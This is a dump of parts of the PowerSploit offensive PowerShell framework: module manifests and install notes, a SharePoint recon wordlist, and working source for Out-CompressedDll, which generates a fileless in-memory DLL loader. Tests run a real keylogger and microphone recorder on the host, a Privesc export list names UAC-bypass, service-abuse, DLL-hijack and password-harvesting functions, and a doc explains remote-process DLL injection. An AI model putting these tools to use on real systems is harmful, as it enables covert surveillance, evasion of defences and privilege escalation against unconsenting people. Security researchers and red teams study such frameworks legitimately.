    // Every reason (DLL_PROCESS_ATTACH, DLL_THREAD_ATTACH, DLL_THREAD_DETACH,
    // DLL_PROCESS_DETACH) is treated the same way: nothing to do.
    const BOOL knownReason = (ul_reason_for_call == DLL_PROCESS_ATTACH)
                          || (ul_reason_for_call == DLL_THREAD_ATTACH)
                          || (ul_reason_for_call == DLL_THREAD_DETACH)
                          || (ul_reason_for_call == DLL_PROCESS_DETACH);
    (void)knownReason;

    return TRUE;
}
36 |
37 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // NTFSParserDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 |
16 |
17 |
18 | // TODO: reference additional headers your program requires here
19 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParserDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Exfiltration/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire Exfiltration folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" (writing here requires administrative rights and makes the module available to every user on the machine)
5 |
6 | To use the module, type `Import-Module Exfiltration`
7 |
8 | To see the commands imported, type `Get-Command -Module Exfiltration`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | PowerSploit is provided under the 3-clause BSD license below.
2 |
3 | *************************************************************
4 |
5 | Copyright (c) 2012, Matthew Graeber
6 | All rights reserved.
7 |
8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
9 |
10 | Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
11 | Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
12 | The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
13 |
14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
15 |
16 |
17 |
--------------------------------------------------------------------------------
/Mayhem/Mayhem.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Mayhem.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = 'e65b93ff-63ba-4c38-97f1-bc4fe5a6651c'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Mayhem Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 |
27 | # List of all files packaged with this module
28 | FileList = 'Mayhem.psm1', 'Mayhem.psd1', 'Usage.md'
29 |
30 | }
31 |
--------------------------------------------------------------------------------
/Mayhem/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire Mayhem folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" (writing here requires administrative rights and makes the module available to every user on the machine)
5 |
6 | To use the module, type `Import-Module Mayhem`
7 |
8 | To see the commands imported, type `Get-Command -Module Mayhem`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/Persistence/Persistence.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'Persistence.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = '633d0f10-a056-41da-869d-6d2f75430195'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Persistence Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 |
27 | # List of all files packaged with this module
28 | FileList = 'Persistence.psm1', 'Persistence.psd1', 'Usage.md'
29 |
30 | }
31 |
--------------------------------------------------------------------------------
/Persistence/Usage.md:
--------------------------------------------------------------------------------
To install this module, drop the entire Persistence folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" (writing here requires administrative rights and makes the module available to every user on the machine)
5 |
6 | To use the module, type `Import-Module Persistence`
7 |
8 | To see the commands imported, type `Get-Command -Module Persistence`
9 |
10 | For help on each individual command, Get-Help is your friend.
--------------------------------------------------------------------------------
/PowerSploit.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem $PSScriptRoot | ? { $_.PSIsContainer -and !('Tests','docs' -contains $_.Name) } | % { Import-Module $_.FullName -DisableNameChecking }
2 |
--------------------------------------------------------------------------------
/PowerSploit.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 14
4 | VisualStudioVersion = 14.0.23107.0
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{F5034706-568F-408A-B7B3-4D38C6DB8A32}") = "PowerSploit", "PowerSploit.pssproj", "{6CAFC0C6-A428-4D30-A9F9-700E829FEA51}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Debug|Any CPU.ActiveCfg = Release|Any CPU
15 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Debug|Any CPU.Build.0 = Release|Any CPU
16 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {6CAFC0C6-A428-4D30-A9F9-700E829FEA51}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | EndGlobal
23 |
--------------------------------------------------------------------------------
/Privesc/Privesc.psd1:
--------------------------------------------------------------------------------
# Module manifest for the PowerSploit Privesc module (PowerUp + Get-System).
@{

# Script module or binary module file associated with this manifest.
ModuleToProcess = 'Privesc.psm1'

# Version number of this module.
ModuleVersion = '3.0.0.0'

# ID used to uniquely identify this module
GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56'

# Author of this module
Author = 'Will Schroeder (@harmj0y)'

# Copyright statement for this module
# (holds the licence name rather than a copyright line; kept as-is for
# consistency with the other PowerSploit manifests)
Copyright = 'BSD 3-Clause'

# Description of the functionality provided by this module
Description = 'PowerSploit Privesc Module'

# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = '2.0'

# Functions to export from this module
# Explicit list: only these names are exported, so any helper function that
# Privesc.psm1 dot-sources but that is not listed here stays module-private.
FunctionsToExport = @(
    'Get-ModifiablePath',
    'Get-ProcessTokenGroup',
    'Get-ProcessTokenPrivilege',
    'Enable-Privilege',
    'Add-ServiceDacl',
    'Set-ServiceBinaryPath',
    'Test-ServiceDaclPermission',
    'Get-UnquotedService',
    'Get-ModifiableServiceFile',
    'Get-ModifiableService',
    'Get-ServiceDetail',
    'Invoke-ServiceAbuse',
    'Write-ServiceBinary',
    'Install-ServiceBinary',
    'Restore-ServiceBinary',
    'Find-ProcessDLLHijack',
    'Find-PathDLLHijack',
    'Write-HijackDll',
    'Get-RegistryAlwaysInstallElevated',
    'Get-RegistryAutoLogon',
    'Get-ModifiableRegistryAutoRun',
    'Get-ModifiableScheduledTaskFile',
    'Get-UnattendedInstallFile',
    'Get-WebConfig',
    'Get-ApplicationHost',
    'Get-SiteListPassword',
    'Get-CachedGPPPassword',
    'Write-UserAddMSI',
    'Invoke-EventVwrBypass',
    'Invoke-PrivescAudit',
    'Get-System'
)

# List of all files packaged with this module
# NOTE(review): this manifest (Privesc.psd1) is not listed, unlike the
# ScriptModification manifest which lists its own .psd1; the field is
# informational only and does not affect what gets loaded.
FileList = 'Privesc.psm1', 'Get-System.ps1', 'PowerUp.ps1', 'README.md'

}
63 |
--------------------------------------------------------------------------------
/Privesc/Privesc.psm1:
--------------------------------------------------------------------------------
# Dot-source every .ps1 beside this module file so its functions land in the
# module scope. Any .ps1 dropped into this directory is executed at import
# time, so the directory must not be writable by untrusted users.
foreach ($ScriptFile in (Get-ChildItem -Path (Join-Path -Path $PSScriptRoot -ChildPath '*.ps1')))
{
    . $ScriptFile.FullName
}
2 |
--------------------------------------------------------------------------------
/Recon/Dictionaries/generic.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/Dictionaries/generic.txt
--------------------------------------------------------------------------------
/Recon/Dictionaries/sharepoint.txt:
--------------------------------------------------------------------------------
1 | _catalogs/masterpage/Forms/AllItems.aspx
2 | _catalogs/wp/Forms/AllItems.aspx
3 | _catalogs/wt/Forms/Common.aspx
4 | _layouts/1033/IMAGES
5 | _layouts/aclinv.aspx
6 | _layouts/addrole.aspx
7 | _layouts/AdminRecycleBin.aspx
8 | _layouts/AreaNavigationSettings.aspx
9 | _Layouts/AreaTemplateSettings.aspx
10 | _Layouts/AreaWelcomePage.aspx
11 | _layouts/associatedgroups.aspx
12 | _layouts/bpcf.aspx
13 | _Layouts/ChangeSiteMasterPage.aspx
14 | _layouts/create.aspx
15 | _layouts/editgrp.aspx
16 | _layouts/editprms.aspx
17 | _layouts/groups.aspx
18 | _layouts/help.aspx
19 | _layouts/images/
20 | _layouts/listedit.aspx
21 | _layouts/ManageFeatures.aspx
22 | _layouts/ManageFeatures.aspx?Scope=Site
23 | _layouts/mcontent.aspx
24 | _layouts/mngctype.aspx
25 | _layouts/mngfield.aspx
26 | _layouts/mngsiteadmin.aspx
27 | _layouts/mngsubwebs.aspx
28 | _layouts/mngsubwebs.aspx?view=sites
29 | _layouts/mobile/mbllists.aspx
30 | _layouts/MyInfo.aspx
31 | _layouts/MyPage.aspx
32 | _layouts/MyTasks.aspx
33 | _layouts/navoptions.aspx
34 | _layouts/NewDwp.aspx
35 | _layouts/newgrp.aspx
36 | _layouts/newsbweb.aspx
37 | _layouts/PageSettings.aspx
38 | _layouts/people.aspx
39 | _layouts/people.aspx?MembershipGroupId=0
40 | _layouts/permsetup.aspx
41 | _layouts/picker.aspx
42 | _layouts/policy.aspx
43 | _layouts/policyconfig.aspx
44 | _layouts/policycts.aspx
45 | _layouts/Policylist.aspx
46 | _layouts/prjsetng.aspx
47 | _layouts/quiklnch.aspx
48 | _layouts/recyclebin.aspx
49 | _Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage
50 | _layouts/role.aspx
51 | _layouts/settings.aspx
52 | _layouts/SiteDirectorySettings.aspx
53 | _layouts/sitemanager.aspx
54 | _Layouts/SiteManager.aspx?lro=all
55 | _layouts/spcf.aspx
56 | _layouts/storman.aspx
57 | _layouts/themeweb.aspx
58 | _layouts/topnav.aspx
59 | _layouts/user.aspx
60 | _layouts/userdisp.aspx
61 | _layouts/userdisp.aspx?ID=1
62 | _layouts/useredit.aspx
63 | _layouts/useredit.aspx?ID=1&Source=%2F%5Flayouts%2Fpeople%2Easpx
64 | _layouts/viewgrouppermissions.aspx
65 | _layouts/viewlsts.aspx
66 | _layouts/vsubwebs.aspx
67 | _layouts/WPPrevw.aspx?ID=247
68 | _layouts/wrkmng.aspx
69 | _vti_bin/Admin.asmx
70 | _vti_bin/alerts.asmx
71 | _vti_bin/dspsts.asmx
72 | _vti_bin/forms.asmx
73 | _vti_bin/Lists.asmx
74 | _vti_bin/people.asmx
75 | _vti_bin/Permissions.asmx
76 | _vti_bin/search.asmx
77 | _vti_bin/UserGroup.asmx
78 | _vti_bin/versions.asmx
79 | _vti_bin/Views.asmx
80 | _vti_bin/webpartpages.asmx
81 | _vti_bin/webs.asmx
82 | _vti_bin/spsdisco.aspx
83 | _vti_bin/AreaService.asmx
84 | _vti_bin/BusinessDataCatalog.asmx
85 | _vti_bin/ExcelService.asmx
86 | _vti_bin/SharepointEmailWS.asmx
87 | _vti_bin/spscrawl.asmx
88 | _vti_bin/spsearch.asmx
89 | _vti_bin/UserProfileService.asmx
90 | _vti_bin/WebPartPages.asmx
91 | default.aspx
92 | Forms/DispForm.aspx
93 | Forms/DispForm.aspx?ID=1
94 | Forms/EditForm.aspx
95 | Forms/EditForm.aspx?ID=1
96 | Forms/Forms/AllItems.aspx
97 | Forms/MyItems.aspx
98 | Forms/NewForm.aspx
99 | Pages/default.aspx
100 | Pages/Forms/AllItems.aspx
101 | shared documents/forms/allitems.aspx
--------------------------------------------------------------------------------
/Recon/Recon.psm1:
--------------------------------------------------------------------------------
# Dot-source every .ps1 beside this module file so its functions land in the
# module scope. Any .ps1 dropped into this directory is executed at import
# time, so the directory must not be writable by untrusted users.
foreach ($ScriptFile in (Get-ChildItem -Path (Join-Path -Path $PSScriptRoot -ChildPath '*.ps1')))
{
    . $ScriptFile.FullName
}
2 |
--------------------------------------------------------------------------------
/ScriptModification/Out-CompressedDll.ps1:
--------------------------------------------------------------------------------
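function Out-CompressedDll
{
<#
.SYNOPSIS

Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.

PowerSploit Function: Out-CompressedDll
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None

.DESCRIPTION

Out-CompressedDll reads a managed (MSIL) dll from disk, Deflate-compresses it,
Base64-encodes the compressed bytes and emits a PowerShell snippet that reverses
the process in memory and hands the resulting byte array to
[Reflection.Assembly]::Load(). The emitted snippet is returned as a single
string; nothing is written to disk on the loading side.

.PARAMETER FilePath

Specifies the path to a managed executable. Relative paths are resolved
against the current location; the path must resolve to exactly one file.

.EXAMPLE

Out-CompressedDll -FilePath evil.dll

Description
-----------
Compresses, base64 encodes, and outputs the code required to load evil.dll in memory.

.NOTES

Only pure MSIL-based dlls can be loaded using this technique. Native or IJW ('it just works' - mixed-mode) dlls will not load.

The emitted loader reads the decompressed stream in a loop until the original
byte count has been recovered. A single DeflateStream.Read call is not
guaranteed to fill the buffer, which previously could hand a truncated image
to Assembly.Load. The loader now throws if fewer bytes than expected come back.

The bytes embedded in the output are not authenticated in any way; whoever can
edit the emitted script controls what is loaded.

.LINK

http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html
#>

    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
    [CmdletBinding()]
    Param (
        [Parameter(Mandatory = $True)]
        [String]
        $FilePath
    )

    # Resolve-Path accepts wildcards and may return several entries; the loader
    # can only embed one image, so insist on exactly one match. A missing path
    # yields zero matches rather than a half-initialised $Path.
    $Resolved = @(Resolve-Path -Path $FilePath -ErrorAction SilentlyContinue)

    if ($Resolved.Count -ne 1)
    {
        Throw "$FilePath does not resolve to exactly one existing file."
    }

    $Path = $Resolved[0].ProviderPath

    # A directory resolves fine but is not a file.
    if (! [IO.File]::Exists($Path))
    {
        Throw "$Path does not exist."
    }

    $FileBytes = [System.IO.File]::ReadAllBytes($Path)

    # Reject anything that is not a PE image. The length guard keeps the
    # slice below from indexing past the end of a tiny file.
    if ($FileBytes.Length -lt 2 -or ((($FileBytes[0..1] | ForEach-Object {[Char]$_}) -join '') -cne 'MZ'))
    {
        Throw "$Path is not a valid executable."
    }

    # $Length is baked into the emitted loader so it knows how many bytes to expect.
    $Length = $FileBytes.Length
    $CompressedStream = New-Object IO.MemoryStream
    $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
    $DeflateStream.Write($FileBytes, 0, $FileBytes.Length)
    # Disposing the DeflateStream flushes the final block; ToArray() still
    # works on the (now closed) MemoryStream.
    $DeflateStream.Dispose()
    $CompressedFileBytes = $CompressedStream.ToArray()
    $CompressedStream.Dispose()
    $EncodedCompressedFile = [Convert]::ToBase64String($CompressedFileBytes)

    # Ratio of the Base64 text that ends up in the script to the raw image size.
    Write-Verbose "Compression ratio: $(($EncodedCompressedFile.Length/$FileBytes.Length).ToString('#%'))"

    # Everything prefixed with a backtick is emitted literally for the loader;
    # $Length and $EncodedCompressedFile are interpolated here.
    $Output = @"
`$EncodedCompressedFile = @'
$EncodedCompressedFile
'@
`$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`$EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress)
`$UncompressedFileBytes = New-Object Byte[]($Length)
`$BytesRead = 0
while (`$BytesRead -lt $Length) {
    `$Count = `$DeflatedStream.Read(`$UncompressedFileBytes, `$BytesRead, $Length - `$BytesRead)
    if (`$Count -le 0) { break }
    `$BytesRead += `$Count
}
`$DeflatedStream.Dispose()
if (`$BytesRead -ne $Length) { throw "Expected $Length bytes after decompression but read `$BytesRead." }
[Reflection.Assembly]::Load(`$UncompressedFileBytes)
"@

    Write-Output $Output
}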
84 |
--------------------------------------------------------------------------------
/ScriptModification/ScriptModification.psd1:
--------------------------------------------------------------------------------
# Module manifest for the PowerSploit ScriptModification module.
@{

# Script module or binary module file associated with this manifest.
ModuleToProcess = 'ScriptModification.psm1'

# Version number of this module.
ModuleVersion = '3.0.0.0'

# ID used to uniquely identify this module
GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610'

# Author of this module
Author = 'Matthew Graeber'

# Copyright statement for this module
# (holds the licence name rather than a copyright line; kept as-is for
# consistency with the other PowerSploit manifests)
Copyright = 'BSD 3-Clause'

# Description of the functionality provided by this module
Description = 'PowerSploit Script Preparation/Modification Module'

# Minimum version of the Windows PowerShell engine required by this module
PowerShellVersion = '2.0'

# Functions to export from this module
# NOTE(review): the wildcard exports every function that ScriptModification.psm1
# dot-sources, including anything that was meant as an internal helper. An
# explicit list (as in Privesc.psd1) keeps the exported surface deliberate.
FunctionsToExport = '*'

# List of all files packaged with this module
FileList = 'ScriptModification.psm1', 'ScriptModification.psd1', 'Out-CompressedDll.ps1', 'Out-EncodedCommand.ps1',
    'Out-EncryptedScript.ps1', 'Remove-Comment.ps1', 'Usage.md'

}
32 |
--------------------------------------------------------------------------------
/ScriptModification/ScriptModification.psm1:
--------------------------------------------------------------------------------
# Dot-source every .ps1 beside this module file so its functions land in the
# module scope. Any .ps1 dropped into this directory is executed at import
# time, so the directory must not be writable by untrusted users.
foreach ($ScriptFile in (Get-ChildItem -Path (Join-Path -Path $PSScriptRoot -ChildPath '*.ps1')))
{
    . $ScriptFile.FullName
}
2 |
--------------------------------------------------------------------------------
/ScriptModification/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire ScriptModification folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module ScriptModification`
7 |
8 | To see the commands imported, type `Get-Command -Module ScriptModification`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/Tests/Exfiltration.tests.ps1:
--------------------------------------------------------------------------------
Set-StrictMode -Version Latest

# Locate the Exfiltration manifest relative to this test file rather than the
# current working directory, then force a clean (re)import.
$TestScriptRoot = Split-Path -Path $MyInvocation.MyCommand.Path -Parent
$ModuleRoot = Resolve-Path -Path "$TestScriptRoot\.."
$ModuleManifest = "$ModuleRoot\Exfiltration\Exfiltration.psd1"

# The [E] wildcard turns Remove-Module into a no-op instead of an error when
# the module is not currently loaded.
Remove-Module -Name [E]xfiltration
Import-Module -Name $ModuleManifest -Force -ErrorAction Stop
9 |
# NOTE: this Describe really starts Get-Keystrokes on the host, drives the
# console window with WScript.Shell and reads the captured keys back from
# %TEMP%\key.log. Run it only where that is acceptable.
Describe 'Get-Keystrokes' {

    # Start from a clean log so the assertions below see only this run's keys.
    if (Test-Path "$($env:TEMP)\key.log") { Remove-Item -Force "$($env:TEMP)\key.log" }
    # The logger records the foreground window title; capture ours for comparison.
    $WindowTitle = (Get-Process -Id $PID).MainWindowTitle

    # Bring this console to the foreground so SendKeys lands here.
    $Shell = New-Object -ComObject wscript.shell
    $Shell.AppActivate($WindowTitle)

    $KeyLogger = Get-Keystrokes -PassThru
    # Give the logger a moment to start before generating input.
    Start-Sleep -Seconds 1

    # Type 'Pester' then six backspaces so the console is left as it was found.
    $Shell.SendKeys("Pester`b`b`b`b`b`b")
    $KeyLogger.Dispose()

    It 'Should output to file' { Test-Path "$($env:TEMP)\key.log" | Should Be $true }

    # Log is CSV; parse it once for the per-field checks below.
    $KeyObjects = Get-Content -Path "$($env:TEMP)\key.log" | ConvertFrom-Csv

    It 'Should log keystrokes' {
        $FileLength = (Get-Item "$($env:TEMP)\key.log").Length
        # Loose lower bound meant to exceed an otherwise empty log (header only)
        # — TODO confirm against the CSV header Get-Keystrokes writes.
        $FileLength | Should BeGreaterThan 14
    }

    It 'Should get foreground window title' {
        $KeyObjects[0].WindowTitle | Should Be $WindowTitle
    }

    It 'Should log time of key press' {
        $KeyTime = [DateTime]::Parse($KeyObjects[0].Time)
        $KeyTime.GetType().Name | Should Be 'DateTime'
    }

    It 'Should stop logging after timeout' {

        # Timeout unit is whatever Get-Keystrokes expects — presumably minutes
        # (0.05 min = 3 s, which fits the 4 s wait below); confirm.
        $Timeout = 0.05
        $KeyLogger = Get-Keystrokes -Timeout $Timeout -PassThru

        Start-Sleep -Seconds 4

        # A runspace that is 'Available' again means the logging job has ended.
        $KeyLogger.Runspace.RunspaceAvailability | Should Be 'Available'
        $KeyLogger.Dispose()
    }

    # Do not leave captured keystrokes behind in %TEMP%.
    Remove-Item -Force "$($env:TEMP)\key.log"
}
55 |
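# NOTE: this Describe really records from the host's microphone into %TEMP%.
Describe "Get-MicrophoneAudio" {

    $RecordPath = "$env:TEMP\test_record.wav"
    # Recording length passed to Get-MicrophoneAudio (unit as the function defines it).
    $RecordLen = 2
    Context 'Successful Recording' {
        BeforeEach {
            # Ensure the recording has been removed prior to testing
            Remove-Item -Path $RecordPath -ErrorAction SilentlyContinue
        }

        AfterEach {
            # Remove the recording after testing
            Remove-Item -Path $RecordPath -ErrorAction SilentlyContinue
        }

        It 'should record audio from the microphone and save it to a specified path' {
            $result = Get-MicrophoneAudio -Path $RecordPath -Length $RecordLen
            $result | Should Not BeNullOrEmpty
            $result.Length | Should BeGreaterThan 0
        }

    }

    Context 'Invalid Arguments' {
        It 'should not allow invalid paths to be used' {
            # -Length must receive the variable, not the literal string 'RecordLen':
            # with the literal the call failed on argument conversion and the
            # invalid-path behaviour was never actually exercised.
            { Get-MicrophoneAudio -Path "c:\FAKEPATH\yay.wav" -Length $RecordLen } | Should Throw
        }
    }

}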
86 |
--------------------------------------------------------------------------------
/Tests/PowerSploit.tests.ps1:
--------------------------------------------------------------------------------
Set-StrictMode -Version Latest

# Repository root, derived from this test file's location so the scan below
# does not depend on the current working directory.
$TestScriptRoot = Split-Path -Path $MyInvocation.MyCommand.Path -Parent
$ModuleRoot = Resolve-Path -Path "$TestScriptRoot\.."
5 |
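filter Assert-NotLittleEndianUnicode {
<#
.SYNOPSIS

Throws when a script file begins with a Unicode byte-order mark.

.DESCRIPTION

Reads the first bytes of each path on the pipeline and throws if the file
starts with either the UTF-16LE BOM (FF FE) or the UTF-8 BOM (EF BB).
Directories, missing files and files shorter than two bytes are skipped with
a debug message.

Note: the marker the original check used, 48111 (0xBBEF), is what the first
two bytes of a UTF-8 BOM (EF BB) read as a little-endian UInt16 — not the
UTF-16LE BOM, which reads as 0xFEFF (65279). Both are now checked, so the
filter matches its name as well as its previous behaviour, and the error
names the encoding actually found.

.PARAMETER FilePath

One or more file paths. FileInfo objects from Get-ChildItem bind through the
FullName alias.
#>
    [CmdletBinding()]
    param (
        [Parameter(Mandatory = $True,
                   ValueFromPipelineByPropertyName = $True,
                   ValueFromPipeline = $True)]
        [Alias('FullName')]
        [String[]]
        $FilePath
    )

    $Utf16LeMarker = 65279 # 0xFEFF: bytes FF FE read as a little-endian UInt16
    $Utf8Marker    = 48111 # 0xBBEF: bytes EF BB read as a little-endian UInt16

    # The parameter is an array; handle each entry rather than stringifying the whole thing.
    foreach ($CurrentPath in $FilePath) {
        Write-Verbose "Current file: $CurrentPath"
        Write-Debug "Current file: $CurrentPath"

        if ([System.IO.Directory]::Exists($CurrentPath)) {
            Write-Debug "File is a directory."
            continue
        }

        if (-not [System.IO.File]::Exists($CurrentPath)) {
            Write-Debug "File does not exist."
            continue
        }

        # @() so a one-byte file yields an array (a bare [Byte] has no Length under StrictMode).
        $FileBytes = @(Get-Content -TotalCount 3 -Encoding Byte -Path $CurrentPath)

        if ($FileBytes.Length -lt 2) {
            Write-Debug "File must be at least 2 bytes in length."
            continue
        }

        $Marker = [BitConverter]::ToUInt16([Byte[]]$FileBytes, 0)

        if ($Marker -eq $Utf16LeMarker) {
            Write-Debug "File contains little endian unicode marker."
            throw "$CurrentPath is little-endian unicode encoded."
        }

        if ($Marker -eq $Utf8Marker) {
            Write-Debug "File contains UTF-8 byte order mark."
            throw "$CurrentPath is UTF-8 encoded with a byte order mark."
        }
    }
}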
44 |
# Walks the whole repository (scripts, manifests and modules) and fails if
# Assert-NotLittleEndianUnicode throws for any of them. A single throw ends
# the pipeline, so only the first offending file is reported per run.
Describe 'ASCII encoding of all scripts' {
    It 'should not contain little-endian unicode encoded scripts or modules' {
        { Get-ChildItem -Path $ModuleRoot -Recurse -Include *.ps1,*.psd1,*.psm1 | Assert-NotLittleEndianUnicode } | Should Not Throw
    }
}
--------------------------------------------------------------------------------
/docs/CodeExecution/Invoke-DllInjection.md:
--------------------------------------------------------------------------------
1 | # Invoke-DllInjection
2 |
3 | ## SYNOPSIS
4 | Injects a Dll into the process ID of your choosing.
5 |
6 | PowerSploit Function: Invoke-DllInjection
7 | Author: Matthew Graeber (@mattifestation)
8 | License: BSD 3-Clause
9 | Required Dependencies: None
10 | Optional Dependencies: None
11 |
12 | ## SYNTAX
13 |
14 | ```
Invoke-DllInjection [-ProcessID] <Int32> [-Dll] <String>
16 | ```
17 |
18 | ## DESCRIPTION
19 | Invoke-DllInjection injects a Dll into an arbitrary process.
It does this by using VirtualAllocEx to allocate memory the size of the
DLL in the remote process, writing the name of the DLL to load into the
remote process's address space using WriteProcessMemory, and then using RtlCreateUserThread
to invoke LoadLibraryA in the context of the remote process.
24 |
25 | ## EXAMPLES
26 |
27 | ### -------------------------- EXAMPLE 1 --------------------------
28 | ```
29 | Invoke-DllInjection -ProcessID 4274 -Dll evil.dll
30 | ```
31 |
32 | Description
33 | -----------
